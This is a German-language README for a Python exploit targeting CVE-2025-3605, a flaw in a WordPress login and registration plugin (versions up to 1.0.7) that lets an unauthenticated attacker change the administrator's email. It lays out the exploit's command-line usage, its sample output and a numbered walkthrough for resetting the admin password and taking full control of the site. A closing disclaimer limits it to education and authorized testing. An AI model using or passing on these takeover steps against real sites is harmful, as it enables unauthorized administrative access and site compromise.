
WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 ist anfällig für Privilege Escalation.
Das Frontend Login and Registration Blocks-Plugin für WordPress (Versionen <= 1.0.7) ist anfällig für Privilegienerhöhung durch Kontoübernahme.
Das Problem entsteht, weil das Plugin keine Benutzeridentität überprüft, wenn sensible Daten wie E-Mails über die Funktion flr_blocks_user_settings_handle_ajax_callback() aktualisiert werden.
✅ Auswirkungen:
Ein nicht authentifizierter Angreifer kann die E-Mail des Administrators ändern, den Prozess "Passwort vergessen" auslösen und das Admin-Passwort zurücksetzen, um die volle Kontrolle zu erlangen.
Das beigefügte Python-Skript automatisiert den Exploit-Prozess, indem es den anfälligen AJAX-Endpunkt angreift:
/wp-admin/admin-ajax.php
Es aktualisiert die E-Mail des angegriffenen Benutzers (normalerweise user_id 1 für Admin) auf eine vom Angreifer kontrollierte E-Mail.
Dateiname: CVE-2025-3605.py
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]
✅ Standardwerte:
--user_id: 1 (Standard-Admin)--mail: [email protected]Um das Hilfemenü anzuzeigen, führen Sie aus:
python CVE-2025-3605.py --help
Ausgabe:
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: [email protected])
✅ Beispielausführung:
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]
✅ Bei Erfolg:
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )
❌ Bei Fehlschlag:
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
1️⃣ Navigieren Sie zu:
http://target-site/wordpress/wp-login.php
2️⃣ Geben Sie die neue E-Mail ein, die Sie gesetzt haben ([email protected]).
3️⃣ Fordern Sie eine Passwortzurücksetzung an.
4️⃣ Legen Sie ein neues Passwort fest.
5️⃣ Melden Sie sich als Administrator an und genießen Sie vollen Zugriff.
Dieser Exploit und das Skript werden nur für Bildungs- und autorisierte Testzwecke bereitgestellt.
Jede unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
By: Khaled Alenazi (Nxploited)